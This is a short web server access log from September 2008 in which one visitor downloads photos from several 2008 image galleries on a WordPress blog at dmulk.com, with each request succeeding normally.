72.199.235.196 - - [20/Sep/2008:09:41:25 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0039.jpg HTTP/1.1" 200 531041 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-079.jpg HTTP/1.1" 200 314695 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-098_0.jpg HTTP/1.1" 200 472289 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:35 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0163.jpg HTTP/1.1" 200 346344 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:38 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0100.jpg HTTP/1.1" 200 552588 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-032_0.jpg HTTP/1.1" 200 354402 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-146_0.jpg HTTP/1.1" 200 203706 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:47 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0154.jpg HTTP/1.1" 200 344712 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0080.jpg HTTP/1.1" 200 410742 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
